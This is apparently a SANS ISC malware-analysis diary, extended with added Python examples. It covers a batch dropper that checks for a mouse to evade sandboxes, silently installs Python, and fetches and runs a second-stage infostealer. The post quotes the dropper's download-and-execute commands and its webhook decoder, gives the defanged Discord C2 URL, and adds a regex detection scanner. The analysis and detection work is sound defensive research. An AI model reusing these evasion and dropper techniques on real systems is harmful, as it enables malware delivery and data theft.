Malware samples have plenty of techniques to detect if they are running in a “safe” environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?).
Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]
set "mouseConnected=false"
for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)
if not !mouseConnected! == true (
    exit /b 1
)
The script uses the WMI (“Windows Management Instrumentation”) client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:
C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value

PNPDeviceID=ACPI\PNP0F13\4&1BD7F811&0
PNPDeviceID=USB\VID_0E0F&PID_0003&MI_01\7&12E62A01&0&0001
PNPDeviceID=USB\VID_0E0F&PID_0003&MI_00\7&12E62A01&0&0000
Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the “wmic” tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.
If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:
set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!
Finally, it will download and execute the second stage:
set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw"
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
)
python -m %OUTPUT_FILE%
del %OUTPUT_FILE%
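The three batch stages above (mouse probe, silent Python install, download-and-run of the second stage) form one recognizable chain. As an added example that is not part of the diary, here is a small Python scanner that flags each of those traits in a .bat file and only raises an alert when the anti-sandbox probe is combined with the download-and-execute behaviour, so a plain hardware-inventory script querying Win32_PointingDevice is not flagged on its own. The sample script embedded below is a constructed, condensed copy of the stages shown in the diary with the URLs defanged; the rule names are my own.

```python
import re

# Constructed sample: a condensed version of the batch stages shown in the diary,
# with defanged URLs. Used only as input for the scanner below.
SAMPLE_BAT = r'''
setlocal enabledelayedexpansion
set "mouseConnected=false"
for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)
if not !mouseConnected! == true ( exit /b 1 )
set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 > NUL 2>&1
set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw"
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
python -m %OUTPUT_FILE%
del %OUTPUT_FILE%
'''

# Constructed benign sample: an inventory script that only lists pointing devices.
BENIGN_BAT = r'''
wmic path Win32_PointingDevice get PNPDeviceID /value > inventory.txt
'''

# Each rule: (name, compiled regex, why a defender cares). Names are my own labels.
RULES = [
    ("wmi_pointing_device_check",
     re.compile(r"wmic\s+path\s+Win32_PointingDevice", re.I),
     "enumerates pointing devices via WMI; a missing mouse is a common sandbox indicator"),
    ("curl_insecure_download",
     re.compile(r"\bcurl\b[^\n]*--insecure", re.I),
     "downloads with TLS certificate verification disabled"),
    ("python_installer_fetch",
     re.compile(r"python-3\.\d+\.\d+[^\s\"]*-amd64\.exe", re.I),
     "references a standalone Python installer used to bootstrap a second stage"),
    ("silent_installer_run",
     re.compile(r"start\s+/wait\s+\S+\s+/quiet", re.I),
     "runs an installer silently"),
    ("run_downloaded_python_module",
     re.compile(r"python\s+-m\s+%\w+%", re.I),
     "executes a .py file that was just written to disk"),
]

def scan_batch(text):
    """Return findings as a list of (rule_name, line_number, explanation)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern, why in RULES:
            if pattern.search(line):
                findings.append((name, lineno, why))
    return findings

def is_suspicious(text):
    """True only when the sandbox probe co-occurs with a download-and-execute step."""
    names = {name for name, _, _ in scan_batch(text)}
    probe = "wmi_pointing_device_check" in names
    dropper = names & {"curl_insecure_download", "run_downloaded_python_module",
                       "silent_installer_run"}
    return probe and bool(dropper)

if __name__ == "__main__":
    for name, lineno, why in scan_batch(SAMPLE_BAT):
        print(f"line {lineno}: {name}: {why}")
    print("suspicious:", is_suspicious(SAMPLE_BAT))
    print("benign inventory script suspicious:", is_suspicious(BENIGN_BAT))
```

The combination rule matters more than any single regex: `wmic path Win32_PointingDevice` is legitimate in asset-inventory scripts, and `curl --insecure` shows up in plenty of sloppy build scripts, but the two together with a silent installer and execution of a freshly downloaded `.py` is the pattern this diary describes.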
The second stage is another InfoStealer. Nothing special except the way the Discord channel used as C2 is obfuscated:
webhook = b'xc8~~xc9(T>>x10x1e(x82=xa1x10x95x82=$>xbcxc9x1e>lM1xc8=={(>xb08-Z-xb3-x8b8x8bx1bxb0xb3xb0xb08x87Zx8b>xf91xe0f&x82gxe0xa7gx98xf0Yxd60xcdXxb4xb4xfexa6xc9xc9l~Y(gxf8x1c&x82xd6Nfx87exe0xf7)xf70e_,8xfexa6Zx1cxe28Mxaf_xc6,1Exf7N_xf2,_x1bne',b'x.x8dV+xb1cx94x9cwxb5x8ct]x12rx91[5yx8ax15Lxe5Bqxd0xa5x0cxd9xe8x9fxddx93Jxd4x88xb8x84xa3Kx02x0fxa8Ex95>-xb08x87x8bx1bxb3xf2x18ZTGx16xb2ixcfx11xb4xf7x07x1cuOYxcdxe0_,m&xf0xaaXxfeWxafx90xf9xc6xaexf8x08nx7fxabx014ex9axbc1x82x10M)fxc8x1exd6{g$xe2=xc9x98xa1(~Nxc5lxa6xa70xba/x053xb6bxfd"xdexa4hx9bIdxc1xc4xb9x96xf3x83x06xbd2Hxc7xc0xd5zxa0x99aoxefx13rx1dP7x14vxa2xeekxebxe1xbf9}:Rxe7'xbb<DQx9e^xfcxad%x8ex1fx97xc2Ux19x86x17x81xffxeaxfax9dFxa9p!xcc#xc3Cx85xdc|xf5j;xbeAxecxe4x80xd2xf4Sxb7xdbxe9x89xcbxd76x0bxe3`@x92x03xf1sxfbnxf6xd1xdaxd3x0exd8tx00x8fxedxe6xac xdfx04xca?*x1axce'
It is decrypted using this simple function:
def DeobfuscateWeb(encrypted_text, key):
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i
    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]
        decrypted_text.append(decrypted_char)
    return bytes(decrypted_text)
and returns “hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_”
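The decoder above is a plain byte-substitution cipher: the key is a 256-byte permutation, and each ciphertext byte is replaced by the position at which that byte value occurs in the key. To show how the scheme works end to end, here is an added example (mine, not code from the sample) that re-implements the decoder, adds the inverse direction the stealer's author must have used to produce the blob, validates that a key really is a full permutation (a short or repeated key leaves table entries at 0 and silently corrupts the output), and round-trips a constructed placeholder URL through a seeded, constructed key. Neither the key nor the webhook below are the real ones from the sample.

```python
from random import Random

def deobfuscate_web(encrypted_text, key):
    """Same logic as the sample's DeobfuscateWeb: build the inverse table
    (key byte -> its index) and map every ciphertext byte through it."""
    table = [0] * 256
    for i, char in enumerate(key):
        table[char] = i
    return bytes(table[char] for char in encrypted_text)

def obfuscate_web(plain_text, key):
    """Inverse direction (assumed; the diary only shows the decoder):
    each plaintext byte b becomes key[b]."""
    return bytes(key[b] for b in plain_text)

def is_valid_key(key):
    """The decoder is only lossless when the key is a permutation of all 256 byte values."""
    return len(key) == 256 and len(set(key)) == 256

def make_constructed_key(seed=1234):
    """Constructed example key: a seeded shuffle of 0..255, not the sample's real key."""
    values = list(range(256))
    Random(seed).shuffle(values)
    return bytes(values)

def round_trip(plain_text, key):
    """Obfuscate then deobfuscate; True when the original bytes come back unchanged."""
    if not is_valid_key(key):
        raise ValueError("key must be a 256-byte permutation")
    return deobfuscate_web(obfuscate_web(plain_text, key), key) == plain_text

if __name__ == "__main__":
    key = make_constructed_key()
    # Constructed placeholder standing in for the real webhook URL.
    plain = b"hxxps://discord[.]com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN"
    blob = obfuscate_web(plain, key)
    print("obfuscated:", blob)
    print("recovered :", deobfuscate_web(blob, key))
```

Because the mapping is a fixed byte-for-byte substitution, the obfuscated blob is exactly as long as the URL it hides, and the key itself ships next to it in the script; an analyst who finds both can recover the C2 with the decoder alone, which is why `is_valid_key` is the only check worth running before trusting the output.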
[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
Source: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/